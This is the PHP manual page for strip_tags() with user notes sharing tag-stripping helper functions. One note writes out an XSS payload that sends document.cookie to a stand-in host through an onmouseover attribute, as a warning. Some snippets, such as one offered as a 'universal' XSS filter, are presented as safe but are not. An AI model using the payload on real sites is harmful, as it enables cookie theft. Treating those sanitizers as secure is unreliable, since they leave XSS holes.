strip_tags

(PHP 4, PHP 5, PHP 7)

strip_tags — Strip HTML and PHP tags from a string

Description

string strip_tags ( string $str [, string $allowable_tags ] )

This function tries to return a string with all NULL bytes, HTML and PHP tags stripped from a given str. It uses the same tag stripping state machine as the fgetss() function.

Parameters

str: The input string.
allowable_tags: You can use the optional second parameter to specify tags which should not be stripped.

Note:
HTML comments and PHP tags are also stripped. This is hardcoded and can not be changed with allowable_tags.

Note:
In PHP 5.3.4 and later, self-closing XHTML tags are ignored and only non-self-closing tags should be used in allowable_tags. For example, to allow both <br> and <br/>, you should use:

<?php strip_tags($input, '<br>'); ?>

Return Values

Returns the stripped string.

Changelog

Version	Description
5.3.4	strip_tags() ignores self-closing XHTML tags in `allowable_tags`.
5.0.0	strip_tags() is now binary safe.

Examples

Example #1 strip_tags() example


<?php
$text = '<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>';
echo strip_tags($text);
echo "\n";

// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>

The above example will output:

Test paragraph. Other text
<p>Test paragraph.</p> <a href="#fragment">Other text</a>

Notes

Warning

Because strip_tags() does not actually validate the HTML, partial or broken tags can result in the removal of more text/data than expected.

Warning

This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users.

Note:
Tag names within the input HTML that are greater than 1023 bytes in length will be treated as though they are invalid, regardless of the allowable_tags parameter.

User Contributed Notes

Kenji

2 years ago


A word of warning!!
Do NOT use "admin at automapit dot com"s regex. It's broken:

"lalala <b<b>> lala </b<b>>"

will be stripped into

"lalala <b> lala </b>"

I CANNOT overstate the severity of the security issues you are introducing with such a code! Don't use it, stay safe.

mariusz.tarnaski at wp dot pl

7 years ago


Hi. I made a function that removes the HTML tags along with their contents:



Function:

<?php

function strip_tags_content($text, $tags = '', $invert = FALSE) {



  preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);

  $tags = array_unique($tags[1]);

    

  if(is_array($tags) AND count($tags) > 0) {

    if($invert == FALSE) {

      return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);

    }

    else {

      return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);

    }

  }

  elseif($invert == FALSE) {

    return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);

  }

  return $text;

}

?>



Sample text:

$text = '<b>sample</b> text with <div>tags</div>';



Result for strip_tags($text):

sample text with tags



Result for strip_tags_content($text):

 text with 



Result for strip_tags_content($text, '<b>'):

<b>sample</b> text with 



Result for strip_tags_content($text, '<b>', TRUE);

 text with <div>tags</div>



I hope that someone is useful :)

CEO at CarPool2Camp dot org

7 years ago


Note the different outputs from different versions of the same tag:



<?php // striptags.php

$data = '<br>Each<br/>New<br />Line';

$new  = strip_tags($data, '<br>');

var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"



<?php // striptags.php

$data = '<br>Each<br/>New<br />Line';

$new  = strip_tags($data, '<br/>');

var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"



<?php // striptags.php

$data = '<br>Each<br/>New<br />Line';

$new  = strip_tags($data, '<br />');

var_dump($new); // OUTPUTS string(11) "EachNewLine"

?>

doug at exploittheweb dot com

8 months ago


"5.3.4    strip_tags() no longer strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags."

This is poorly worded.

The above seems to be saying that, since 5.3.4, if you don't specify "<br/>" in allowable_tags then "<br/>" will not be stripped... but that's not actually what they're trying to say.

What it means is, in versions prior to 5.3.4, it "strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags", and that since 5.3.4 this is no longer the case.

So what reads as "no longer strips self-closing tags (unless the self-closing XHTML tag is also given in allowable_tags)" is actually saying "no longer (strips self-closing tags unless the self-closing XHTML tag is also given in allowable_tags)".

i.e.

pre-5.3.4: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br>' // strips <br/> because it wasn't explicitly specified in allowable_tags

5.3.4 and later: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br><br/>' // does not strip <br/> because PHP matches it with <br> in allowable_tags

Trititaty

4 months ago


Features:
* allowable tags (as in strip_tags),
* optional stripping attributes of the allowable tags,
* optional comment preserving,
* deleting broken and unclosed tags and comments,
* optional callback function call for every piece processed allowing for flexible replacements.

<?php
function better_strip_tags( $str, $allowable_tags = '', $strip_attrs = false, $preserve_comments = false, callable $callback = null ) {
  $allowable_tags = array_map( 'strtolower', array_filter( // lowercase
      preg_split( '/(?:>|^)\\s*(?:<|$)/', $allowable_tags, -1, PREG_SPLIT_NO_EMPTY ), // get tag names
      function( $tag ) { return preg_match( '/^[a-z][a-z0-9_]*$/i', $tag ); } // filter broken
  ) );
  $comments_and_stuff = preg_split( '/(<!--.*?(?:-->|$))/', $str, -1, PREG_SPLIT_DELIM_CAPTURE );
  foreach ( $comments_and_stuff as $i => $comment_or_stuff ) {
    if ( $i % 2 ) { // html comment
      if ( !( $preserve_comments && preg_match( '/<!--.*?-->/', $comment_or_stuff ) ) ) {
        $comments_and_stuff[$i] = '';
      }
    } else { // stuff between comments
      $tags_and_text = preg_split( "/(<(?:[^>\"']++|\"[^\"]*+(?:\"|$)|'[^']*+(?:'|$))*(?:>|$))/", $comment_or_stuff, -1, PREG_SPLIT_DELIM_CAPTURE );
      foreach ( $tags_and_text as $j => $tag_or_text ) {
        $is_broken = false;
        $is_allowable = true;
        $result = $tag_or_text;
        if ( $j % 2 ) { // tag
          if ( preg_match( "%^(</?)([a-z][a-z0-9_]*)\\b(?:[^>\"'/]++|/+?|\"[^\"]*\"|'[^']*')*?(/?>)%i", $tag_or_text, $matches ) ) {
            $tag = strtolower( $matches[2] );
            if ( in_array( $tag, $allowable_tags ) ) {
              if ( $strip_attrs ) {
                $opening = $matches[1];
                $closing = ( $opening === '</' ) ? '>' : $closing;
                $result = $opening . $tag . $closing;
              }
            } else {
              $is_allowable = false;
              $result = '';
            }
          } else {
            $is_broken = true;
            $result = '';
          }
        } else { // text
          $tag = false;
        }
        if ( !$is_broken && isset( $callback ) ) {
          // allow result modification
          call_user_func_array( $callback, array( &$result, $tag_or_text, $tag, $is_allowable ) );
        }
        $tags_and_text[$j] = $result;
      }
      $comments_and_stuff[$i] = implode( '', $tags_and_text );
    }
  }
  $str = implode( '', $comments_and_stuff );
  return $str;
}
?>

Callback arguments:
* &$result: contains text to be placed insted of original piece (e.g. empty string for forbidden tags), it can be changed;
* $tag_or_text: original piece of text or a tag (see below);
* $tag: false for text between tags, lowercase tag name for tags;
* $is_allowable: boolean telling if a tag isn't allowed (to avoid double checking), always true for text between tags
Callback function isn't called for comments and broken tags.

Caution: the function doesn't fully validate tags (the more so HTML itself), it just force strips those obviously broken (in addition to stripping forbidden tags). If you want to get valid tags then use strip_attrs option, though it doesn't guarantee tags are balanced or used in the appropriate context. For complex logic consider using DOM parser.

bzplan at web dot de

3 years ago


a HTML code like this: 

<?php
$html = '
<div>
<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>
<p>material is wood</p>
</div>
'; 
?>

with <?php $str = strip_tags($html); ?>
... the result is:

$str = 'color is bluesize is huge
material is wood'; 

notice: the words 'blue' and 'size' grow together :( 
and line-breaks are still in new string $str

if you need a space between the words (and without line-break) 
use my function: <?php $str = rip_tags($html); ?>
... the result is:

$str = 'color is blue size is huge material is wood'; 

the function: 

<?php
// -------------------------------------------------------------- 

function rip_tags($string) { 
    
    // ----- remove HTML TAGs ----- 
    $string = preg_replace ('/<[^>]*>/', ' ', $string); 
    
    // ----- remove control characters ----- 
    $string = str_replace("\r", '', $string);    // --- replace with empty space
    $string = str_replace("\n", ' ', $string);   // --- replace with space
    $string = str_replace("\t", ' ', $string);   // --- replace with space
    
    // ----- remove multiple spaces ----- 
    $string = trim(preg_replace('/ {2,}/', ' ', $string));
    
    return $string; 

}

// -------------------------------------------------------------- 
?>

the KEY is the regex pattern: '/<[^>]*>/'
instead of strip_tags() 
... then remove control characters and multiple spaces
:)

Dr. Gianluigi "Zane" Zanettini

6 months ago


A word of caution. strip_tags() can actually be used for input validation as long as you remove ANY tag. As soon as you accept a single tag (2nd parameter), you are opening up a security hole such as this:

<acceptedTag onLoad="javascript:malicious()" />

Plus: regexing away attributes or code block is really not the right solution. For effective input validation when using strip_tags() with even a single tag accepted, http://htmlpurifier.org/ is the way to go.

obeyer at popsugar dot com

2 years ago


actually, for PHP 5.4.19, if you want to add line breaks <br> to allowable tags, you should use "<br>". Both <br/> and <br /> in allowable tags won't do anything, and line breaks will be stripped

bnt dot gloria at outlook dot com

1 year ago


With allowable_tags, strip-tags is not safe.

<?php

$str= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str= strip_tags($str, '<p>');
echo $str; // DISPLAY: <p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";

?>

cesar at nixar dot org

10 years ago


Here is a recursive function for strip_tags like the one showed in the stripslashes manual page.

<?php
function strip_tags_deep($value)
{
  return is_array($value) ?
    array_map('strip_tags_deep', $value) :
    strip_tags($value);
}

// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);

// Output
print_r($array);
?>

tom at cowin dot us

5 years ago


With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it... 



<?php



    function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')

    {

        mb_regex_encoding('UTF-8');

        //replace MS special characters first

        $search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');

        $replace = array('\'', '\'', '"', '"', '-');

        $text = preg_replace($search, $replace, $text);

        //make sure _all_ html entities are converted to the plain ascii equivalents - it appears

        //in some MS headers, some html entities are encoded and some aren't

        $text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');

        //try to strip out any C style comments first, since these, embedded in html comments, seem to

        //prevent strip_tags from removing html comments (MS Word introduced combination)

        if(mb_stripos($text, '/*') !== FALSE){

            $text = mb_eregi_replace('#/\*.*?\*/#s', '', $text, 'm');

        }

        //introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be

        //'<1' becomes '< 1'(note: somewhat application specific)

        $text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);

        $text = strip_tags($text, $allowed_tags);

        //eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one

        $text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);

        //strip out inline css and simplify style tags

        $search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');

        $replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');

        $text = preg_replace($search, $replace, $text);

        //on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears

        //that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains

        //some MS Style Definitions - this last bit gets rid of any leftover comments */

        $num_matches = preg_match_all("/\<!--/u", $text, $matches);

        if($num_matches){

              $text = preg_replace('/\<!--(.)*--\>/isu', '', $text);

        }

        return $text;

    }

?>

sERGE-01

2 years ago


Fix for my Example2. 
If the text does not have allowed tags, $out_text is empty. Fix:

<?php
    $out_text = "";
    $ofs = 0;
    if(preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        foreach($matches[0] as $tag)
        {
            $out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
            $out_text .= $tag[0];
            $ofs = $tag[1] + strlen($tag[0]);
        }
    }
    $out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); // end of text
?>

valentin dot boschatel at evalandgo dot com

11 months ago


Hi,

I havee a problem with this function. I want use this symbol in my text ( < ), but it doesn't work because I added character stuck to that symbol.

Exemple :
<?php
$test = '<p><span style="color: #ff0000; background-color: #000000;">Complex</span> <span style="font-family: impact,chicago;">text <50% </span> <a href="http://exempledomain.com/"><em>with</em></a> <span style="font-size: 36pt;"><strong>tags</strong></span></p>';

echo strip_tags('$test');
// Outputs : Complex text
?>

I made a function for this :

Function: 
<?php
function strip_tags_review($str, $allowable_tags = '') {

    preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($allowable_tags), $tags);
    $tags = array_unique($tags[1]);

    if(is_array($tags) AND count($tags) > 0) {
        $pattern = '@<(?!(?:' . implode('|', $tags) . ')\b)(\w+)\b.*?>(.*?)</\1>@i';
    }
    else {
        $pattern = '@<(\w+)\b.*?>(.*?)</\1>@i';
    }

    $str = preg_replace($pattern, '$2', $str);
    return preg_match($pattern, $str) ? strip_tags_review($str, $allowable_tags) : $str;
}

echo strip_tags_review($test);
// Outputs: Complex text <50%  with tags

echo strip_tags_review($test, '<a>');
// Outputs: Complex text <50%  <a href="http://exempledomain.com">with</a> tags
?>

mshaffer

2 years ago


Below was a note on "strip_tags" page that got removed off of PHP.net ... I found this note useful, and use the code in parsing before "stripping tags" ... I don't know why in the world you would delete this one, but keep others ... your review system is a bit disturbing ...

On your page you have a warning about how data may be lost, but you delete a user-contributed comment that helps prevent that?

======================

aleksey at favor dot com dot ua 24-Feb-2011 01:06

strip_tags destroys the whole HTML behind the tags with invalid attributes. Like <img src="/images/image.jpg""> (look, there is an odd quote before >.) 

So I wrote function which fixes unsafe attributes and replaces odd " and ' quotes with &quot; and &#39;. 

<?php 
function fix_unsafe_attributes($s) { 
  $out = false; 
  while (preg_match('/<([A-Za-z])[^>]*?>/', $s, $i, PREG_OFFSET_CAPTURE)) { // find where the tag begins 
    $i = $i[1][1]+1; 
    $out.= substr($s, 0, $i); 
    $s = substr($s, $i); 

    // scan attributes and find odd " and ' 
    while (((($i1 = strpos($s, '"')) || 1) && (($i2 = strpos($s, '\'')) || 1)) && ($i1 !== false || $i2 !== false) && 
           (($i = (int)(($i1 !== false) && ($i2 !== false) ? ($i1 < $i2 ? $i1 : $i2) : ($i1 == false ? $i2 : $i1))) !== false) && 
           ((($c = strpos($s, '>')) === false) || ($i < $c))) { 

      $c = $s{$i}; 
      if (($i < 1) || ($s{$i-1} != '=')) { 
        $out.= substr($s, 0, $i).($s{$i} == '"' ? '&quot;' : '&#39;'); // replace odd " and ' 
        $s = substr($s, $i+1); 
      }else { 
        $i++; 
        $out.= substr($s, 0, $i); 
        $s = substr($s, $i); 

        if (($i = strpos($s, $c)) !== false) { 
          $i++; 
          $out.= substr($s, 0, $i); 
          $s = substr($s, $i); 
        } 
      } 
    } 
  } 
  return $out.$s; 
} 
?> 

Maybe this function can be rewritten with simple regular expression but I have no luck to make it quickly.

pietro777

1 year ago


$data = '<br>Each<br/>New<br />Line'; 
$new  = strip_tags($data, '<br />||<br/>||<br>'); 
var_dump($new); // OUTPUTS string(11) "<br>Each<br/>New<br />Line"

sERGE-01

2 years ago


My strip_tags:

1) Simple removal of all disallowed tags. Broken tags remain unchanged:
<?php
    $tags_allowed = "a|b|i|s|u|br";
    $in_text = "<b>Bold</b><table><tr><td>Table</td></tr></table><br><i>Italic>></i><div>Div</div>";
    
    $out_text = preg_replace('#</?(?!('.$tags_allowed.'))\b([^><]*>)#sim', "", $in_text);
    
    print "Example 1:<br>";
    print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 1:
<b>Bold</b>Table<br><i>Italic>></i>Div
-------------------------------

2) This example leaves all allowed tags and screen the rest of the text with  htmlentities() function:
<?php
    // getting all of allowed tags with their offset
    if(preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        $out_text = "";
        $ofs = 0;
        foreach($matches[0] as $tag)
        {
            // text before allowed tag
            $out_text .= htmlentities(substr($in_text,$ofs,$tag[1]-$ofs), ENT_NOQUOTES, "cp1251"); 
            $out_text .= $tag[0]; // next allowed tag
            $ofs = $tag[1] + strlen($tag[0]);
        }
        // adding end of text
        $out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); 
    }

    print "Example 2:<br>";
    print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 2:
<b>Bold</b>&lt;table&gt;&lt;tr&gt;&lt;td&gt;Table&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br>
<i>Italic&gt;&gt;</i>&lt;div&gt;Div&lt;/div&gt;
-------------------------------

denis dot for dot spam at gmail dot com

5 months ago


my function to remove specific tags with the content and can remove elements with attributes
<?php
function strip_selected_tags_content( $text, $tags = array() ) {
    foreach ( $tags as $key => $val ) {
        if ( ! is_array( $val ) ) {
            $text = preg_replace( '/<' . $val . '[^>]*>([\s\S]*?)<\/' . $val . '[^>]*>/', '', $text );
        } else {
            $text = preg_replace( '/<' . $val[0] . ' ' . $val[1] . '[^>]*>([\s\S]*?)<\/' . $val[0] . '[^>]*>/', '', $text );
        }
    }
    return $text;
}
?>
example:
<?php
$clear = array('social',
            'script',
            'noindex',
            'time',
            'header',
            array( 'div', 'class="tags"' ),
            array( 'div', 'class="box_comments"' ),
            array( 'p', 'class="form-submit"' ),
            array( 'div', 'class="comment-form-comment"' )
            )
text = '<preheader>image article</preheader>
<header>nnnnn</header>
<social>fb code, google code etc...</social>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
<div class="tags">true code, that code</div>
<div calss="comment-form-comment"> coment form on blog</div>
';
echo strip_selected_tags_content($text, $clear);
?>
output:
<?php
<preheader>image article</preheader>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
?>

andy

2 years ago


<?php
//***    Universal prevent xss  ***
//   place this in top of script to prevent xss on your site
$_GET=array_map("strip_tags",$_GET);
$_POST=array_map("strip_tags",$_POST);
?>

salavert at~ akelos

10 years ago


<?php
       /**
    * Works like PHP function strip_tags, but it only removes selected tags.
    * Example:
    *     strip_selected_tags('<b>Person:</b> <strong>Salavert</strong>', 'strong') => <b>Person:</b> Salavert
    */

    function strip_selected_tags($text, $tags = array())
    {
        $args = func_get_args();
        $text = array_shift($args);
        $tags = func_num_args() > 2 ? array_diff($args,array($text))  : (array)$tags;
        foreach ($tags as $tag){
            if(preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)){
                $text = str_replace($found[0],$found[1],$text);
          }
        }

        return $text;
    }

?>

Hope you find it useful,

Jose Salavert

kai at froghh dot de

7 years ago


a function that decides if < is a start of a tag or a lower than / lower than + equal:



<?php

function lt_replace($str){

    return preg_replace("/<([^[:alpha:]])/", '&lt;\\1', $str);

}

?>



It's to be used before strip_slashes.

fernando at zauber dot es

1 year ago


As you probably know, the native function strip_tags don't work very well with malformed HTML when you use the allowed tags parameter.
This is a very simple but effective function to remove html tags. It takes a list (array) of allowed tags as second parameter:

<?php
function flame_strip_tags($html, $allowed_tags=array()) {
  $allowed_tags=array_map(strtolower,$allowed_tags);
  $rhtml=preg_replace_callback('/<\/?([^>\s]+)[^>]*>/i', function ($matches) use (&$allowed_tags) {        
    return in_array(strtolower($matches[1]),$allowed_tags)?$matches[0]:'';
  },$html);
  return $rhtml;
}
?>

The function works reasonably well with invalid/bad formatted HTML.

Use:

<?php
$allowed_tags=array("h1","a");
$html=<<<EOD
<h1>Example</h1>
<dt><a href='/manual/en/getting-started.php'>Getting Started</a></dt>
    <dd><a href='/manual/en/introduction.php'>Introduction</a></dd>
    <dd><a href='/manual/en/tutorial.php'>A simple tutorial</a></dd>
<dt><a href='/manual/en/langref.php'>Language Reference</a></dt>
    <dd><a href='/manual/en/language.basic-syntax.php'>Basic syntax</a></dd>
    <dd><a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a></dd>
</dl>
EOD;
echo flame_strip_tags($html,$allowed_tags);
?>

The output will be:

<h1>Example</h1>
<a href='/manual/en/getting-started.php'>Getting Started</a>
<a href='/manual/en/introduction.php'>Introduction</a>
<a href='/manual/en/tutorial.php'>A simple tutorial</a>
<a href='/manual/en/langref.php'>Language Reference</a>
<a href='/manual/en/language.basic-syntax.php'>Basic syntax</a>
<a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a>

brettz9 AAT yah

7 years ago


Works on shortened <?...?> syntax and thus also will remove XML processing instructions.

admin at automapit dot com

9 years ago


<?php

function html2txt($document){

$search = array('@<script[^>]*?>.*?</script>@si',  // Strip out javascript

               '@<[\/\!]*?[^<>]*?>@si',            // Strip out HTML tags

               '@<style[^>]*?>.*?</style>@siU',    // Strip style tags properly

               '@<![\s\S]*?--[ \t\n\r]*>@'         // Strip multi-line comments including CDATA

);

$text = preg_replace($search, '', $document);

return $text;

}

?>



This function turns HTML into text... strips tags, comments spanning multiple lines including CDATA, and anything else that gets in it's way.



It's a frankenstein function I made from bits picked up on my travels through the web, thanks to the many who have unwittingly contributed!

strip_tags

Description

Parameters

Return Values

Changelog

Examples

Notes

See Also

User Contributed Notes